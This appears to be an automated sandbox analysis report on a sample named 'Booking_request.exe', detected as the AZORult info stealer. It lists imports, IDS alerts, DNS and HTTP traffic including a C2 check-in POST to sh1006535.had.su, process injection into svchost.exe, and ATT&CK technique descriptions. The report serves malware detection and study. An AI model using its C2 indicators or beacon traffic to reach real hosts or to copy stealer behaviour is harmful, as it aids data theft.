KERNEL32.dll	GetCommandLineW, GetCurrentProcess, GetSystemDefaultUILanguage, GetThreadLocale, GetUserDefaultUILanguage, GetCurrentThreadId, GetSystemDefaultLangID, GetACP, GetCommandLineA, GetLastError, GetThreadUILanguage, GetCurrentThread, SwitchToThread, GetCurrentProcessorNumber, GetErrorMode, GetCurrentProcessId, GetProcessHeap, GetTickCount, GetEnvironmentStringsW, VirtualAlloc, HeapAlloc, WriteFile, CreateFileW, CloseHandle, HeapSize, SetStdHandle, FreeEnvironmentStringsW, GetOEMCP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringW, GetLocaleInfoW, GetStringTypeW, GetCPInfo, SetEvent, ResetEvent, WaitForSingleObjectEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, InitializeSListHead, RaiseException, RtlUnwind, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, GetStdHandle, HeapFree, GetFileType, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FlushFileBuffers, GetConsoleCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, WriteConsoleW
USER32.dll	GetActiveWindow, GetFocus, GetDialogBaseUnits, GetMessageTime, GetDesktopWindow, GetForegroundWindow, GetShellWindow
SHELL32.dll	ShellExecuteA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/24/20-11:06:12.243955	TCP	2029466	ET TROJAN Win32/AZORult V3.3 Client Checkin M13	49843	80	192.168.2.3	45.147.197.20

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 24, 2020 11:06:12.206954002 CET	49843	80	192.168.2.3	45.147.197.20
Feb 24, 2020 11:06:12.242808104 CET	80	49843	45.147.197.20	192.168.2.3
Feb 24, 2020 11:06:12.243091106 CET	49843	80	192.168.2.3	45.147.197.20
Feb 24, 2020 11:06:12.243954897 CET	49843	80	192.168.2.3	45.147.197.20
Feb 24, 2020 11:06:12.279860973 CET	80	49843	45.147.197.20	192.168.2.3
Feb 24, 2020 11:06:12.282928944 CET	80	49843	45.147.197.20	192.168.2.3
Feb 24, 2020 11:06:12.283068895 CET	80	49843	45.147.197.20	192.168.2.3
Feb 24, 2020 11:06:12.283102036 CET	80	49843	45.147.197.20	192.168.2.3
Feb 24, 2020 11:06:12.283113003 CET	80	49843	45.147.197.20	192.168.2.3
Feb 24, 2020 11:06:12.283130884 CET	49843	80	192.168.2.3	45.147.197.20
Feb 24, 2020 11:06:12.285011053 CET	49843	80	192.168.2.3	45.147.197.20
Feb 24, 2020 11:06:13.328694105 CET	49843	80	192.168.2.3	45.147.197.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 24, 2020 11:05:36.468585968 CET	56796	53	192.168.2.3	8.8.8.8
Feb 24, 2020 11:05:36.517055988 CET	53	56796	8.8.8.8	192.168.2.3
Feb 24, 2020 11:05:39.736383915 CET	53425	53	192.168.2.3	8.8.8.8
Feb 24, 2020 11:05:39.778206110 CET	53	53425	8.8.8.8	192.168.2.3
Feb 24, 2020 11:05:39.952039957 CET	62153	53	192.168.2.3	8.8.8.8
Feb 24, 2020 11:05:39.985680103 CET	53	62153	8.8.8.8	192.168.2.3
Feb 24, 2020 11:05:40.759938955 CET	64848	53	192.168.2.3	8.8.8.8
Feb 24, 2020 11:05:40.793720007 CET	53	64848	8.8.8.8	192.168.2.3
Feb 24, 2020 11:05:41.767611027 CET	52368	53	192.168.2.3	8.8.8.8
Feb 24, 2020 11:05:41.792915106 CET	53	52368	8.8.8.8	192.168.2.3
Feb 24, 2020 11:05:41.825467110 CET	55161	53	192.168.2.3	8.8.8.8
Feb 24, 2020 11:05:41.876779079 CET	53	55161	8.8.8.8	192.168.2.3
Feb 24, 2020 11:05:42.724617004 CET	61263	53	192.168.2.3	8.8.8.8
Feb 24, 2020 11:05:42.749861002 CET	53	61263	8.8.8.8	192.168.2.3
Feb 24, 2020 11:05:45.785841942 CET	57411	53	192.168.2.3	8.8.8.8
Feb 24, 2020 11:05:45.942719936 CET	53	57411	8.8.8.8	192.168.2.3
Feb 24, 2020 11:05:49.947978020 CET	58272	53	192.168.2.3	8.8.8.8
Feb 24, 2020 11:05:49.973356009 CET	53	58272	8.8.8.8	192.168.2.3
Feb 24, 2020 11:06:12.153839111 CET	49907	53	192.168.2.3	8.8.8.8
Feb 24, 2020 11:06:12.187583923 CET	53	49907	8.8.8.8	192.168.2.3
Feb 24, 2020 11:06:18.063348055 CET	53625	53	192.168.2.3	8.8.8.8
Feb 24, 2020 11:06:18.088736057 CET	53	53625	8.8.8.8	192.168.2.3
Feb 24, 2020 11:06:18.763938904 CET	53327	53	192.168.2.3	8.8.8.8
Feb 24, 2020 11:06:18.789227009 CET	53	53327	8.8.8.8	192.168.2.3
Feb 24, 2020 11:06:18.839534044 CET	55279	53	192.168.2.3	8.8.8.8
Feb 24, 2020 11:06:18.864876032 CET	53	55279	8.8.8.8	192.168.2.3
Feb 24, 2020 11:06:23.164398909 CET	62778	53	192.168.2.3	8.8.8.8
Feb 24, 2020 11:06:23.189733028 CET	53	62778	8.8.8.8	192.168.2.3
Feb 24, 2020 11:06:34.412707090 CET	51420	53	192.168.2.3	8.8.8.8
Feb 24, 2020 11:06:34.457128048 CET	53	51420	8.8.8.8	192.168.2.3
Feb 24, 2020 11:06:35.711301088 CET	63844	53	192.168.2.3	8.8.8.8
Feb 24, 2020 11:06:35.746351004 CET	53	63844	8.8.8.8	192.168.2.3
Feb 24, 2020 11:07:01.139295101 CET	61605	53	192.168.2.3	8.8.8.8
Feb 24, 2020 11:07:01.164657116 CET	53	61605	8.8.8.8	192.168.2.3
Feb 24, 2020 11:07:01.789745092 CET	50594	53	192.168.2.3	8.8.8.8
Feb 24, 2020 11:07:01.833506107 CET	53	50594	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 24, 2020 11:06:12.153839111 CET	192.168.2.3	8.8.8.8	0x1bb6	Standard query (0)	sh1006535.had.su	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 24, 2020 11:06:12.187583923 CET	8.8.8.8	192.168.2.3	0x1bb6	No error (0)	sh1006535.had.su		45.147.197.20	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

sh1006535.had.su

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49843	45.147.197.20	80	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
Feb 24, 2020 11:06:12.243954897 CET	193	OUT	POST /index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: sh1006535.had.su Content-Length: 105 Cache-Control: no-cache Data Raw: 00 00 00 26 66 99 26 66 9b 42 70 9d 33 70 9d 34 70 9d 37 16 ec 26 67 ea 26 66 97 26 66 9a 26 66 9f 26 66 9a 26 66 97 26 66 9e 26 66 99 42 70 9c 47 70 9d 30 70 9d 36 70 9d 35 70 9d 30 70 9d 30 70 9d 3b 13 8b 30 6c 8b 31 11 eb 45 70 9d 31 16 e8 41 70 9d 36 70 9d 30 70 9c 47 70 9d 35 14 eb 40 70 9d 31 70 9d 33 10 ec Data Ascii: &f&fBp3p4p7&g&f&f&f&f&f&f&fBpGp0p6p5p0p0p;0l1Ep1Ap6p0pGp5@p1p3
Feb 24, 2020 11:06:12.282928944 CET	194	IN	HTTP/1.1 403 Forbidden Server: ngjit Connection: keep-alive Keep-Alive: timeout=60 Set-Cookie: __ddg1=MYXn5XsuOzWLl2hoUqNt; Domain=.had.su; HttpOnly; Path=/; Expires=Tue, 23-Feb-2021 10:06:12 GMT Date: Mon, 24 Feb 2020 10:06:12 GMT Content-Type: text/html Content-Length: 3835 ETag: "5d7f691c-efb"
Feb 24, 2020 11:06:12.283068895 CET	195	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 63 6f 75 6e 74 20 64 69 73 61 62 6c 65 64 20 62 79 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 3c 2f 74 Data Ascii: <!DOCTYPE html><html><head> <title>Account disabled by server administrator</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style> body { font-weight: normal; font-size: 11px; font-fam
Feb 24, 2020 11:06:12.283102036 CET	197	IN	Data Raw: 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 Data Ascii: width: 14px; height: 14px; border-radius: 14px; margin: 0 auto; margin-top: 0px; } .fatal-error-message { font-size: 12px; overflow: hidden; padding: 0 10px; color: #fff; }
Feb 24, 2020 11:06:12.283113003 CET	198	IN	Data Raw: d1 8e d1 87 d0 b5 d0 bd 20 d0 b0 d0 b4 d0 bc d0 b8 d0 bd d0 b8 d1 81 d1 82 d1 80 d0 b0 d1 82 d0 be d1 80 d0 be d0 bc 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d0 b0 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 Data Ascii: .</div> </div> </div> </div> <div class="b-copyright"> <a class="b-copyright__link" href="http://ispsystem.com/external/ispmanager.html" target="_blank">ISPsyste

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Booking_request.exe PID: 1816 Parent PID: 2644

General

Start time:	11:05:42
Start date:	24/02/2020
Path:	C:\Users\user\Desktop\Booking_request.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Booking_request.exe'
Imagebase:	0x940000
File size:	1569992 bytes
MD5 hash:	FF17014CBB249E173309A9E1251E4574
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, Author: Joe Security Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 4412 Parent PID: 1816

General

Start time:	11:06:10
Start date:	24/02/2020
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\svchost.exe
Imagebase:	0x290000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Azorult, Description: detect Azorult in memory, Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Azorult_1, Description: Azorult Payload, Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
Reputation:	low

Chronological Activities

Disassembly

Reset < >

Description:	Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may check for the presence of a virtual machine environment (VME) or sandbox to avoid potential detection of tools and activities. If the adversary detects a VME, they may alter their malware to conceal the core functions of the implant or disengage from the victim. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information from learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used. Adversaries may also use local host files in order to discover the hostname to IP address mappings of remote systems.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Booking_request.exe

Overview

General Information

Detection

Confidence

Classification

Mitre Att&ck Matrix

Signature Overview

AV Detection:

Networking:

System Summary:

Data Obfuscation:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Malware Configuration

Behavior Graph

Simulations

Behavior and APIs

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior